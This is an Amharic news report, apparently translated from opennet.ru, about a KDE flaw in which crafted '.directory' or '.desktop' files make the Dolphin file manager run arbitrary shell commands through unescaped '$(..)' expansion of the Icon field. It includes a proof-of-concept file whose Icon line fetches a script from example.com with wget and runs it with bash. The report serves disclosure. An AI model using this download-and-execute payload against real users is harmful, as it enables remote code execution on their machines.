በ KDE ውስጥ , ይህም አጥቂው ተጠቃሚው በተለየ ሁኔታ የተነደፉ ".desktop" እና ".directory" ፋይሎችን የያዘ ማውጫ ወይም ማህደር ሲመለከት የዘፈቀደ ትዕዛዞችን እንዲፈጽም ያስችለዋል። ጥቃት ተጠቃሚው በቀላሉ በዶልፊን ፋይል አቀናባሪ ውስጥ ያሉትን የፋይሎች ዝርዝር ማየት፣ ተንኮል አዘል ዴስክቶፕ ፋይል ማውረድ ወይም አቋራጭ ወደ ዴስክቶፕ ወይም ወደ ሰነድ መጎተት ይፈልጋል። ችግሩ አሁን ባለው የቤተ-መጻህፍት መለቀቅ ላይ እራሱን ያሳያል እና የቆዩ ስሪቶች፣ እስከ KDE 4. ተጋላጭነቱ አሁንም ነው። (CVE አልተመደበም)።
ችግሩ የተፈጠረው በKDesktopFile ክፍል ትክክል ባልሆነ አተገባበር ነው፣ የ"አዶ" ተለዋዋጭን ሲያቀናብር፣ ያለአግባብ ማምለጥ፣ እሴቱን ወደ KConfigPrivate::expandString() ተግባር ያስተላልፋል፣ ይህም ሂደትን ጨምሮ የሼል ልዩ ቁምፊዎችን መስፋፋትን ያከናውናል ሕብረቁምፊዎች "$(..)" እንደ ትዕዛዝ እንዲፈጸሙ . ከኤክስዲጂ ዝርዝር መስፈርቶች በተቃራኒ ትግበራ የሼል ግንባታዎች የሚዘጋጁት የቅንጅቶችን አይነት ሳይለዩ ነው, ማለትም. የመተግበሪያውን የትእዛዝ መስመር ሲወስኑ ብቻ ሳይሆን በነባሪነት የሚታዩትን አዶዎች ሲገልጹም እንዲሁ።
ለምሳሌ ለማጥቃት ለተጠቃሚው የዚፕ ማህደር እንደ “.directory” ፋይል ካለው ማውጫ ጋር ላክ
[Desktop Entry]
Type=Directory
አዶ[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
በዶልፊን ፋይል አቀናባሪ ውስጥ የማህደሩን ይዘቶች ለማየት ሲሞክሩ https://example.com/FILENAME.sh ስክሪፕት ይወርዳል እና ይፈጸማል።
ምንጭ: opennet.ru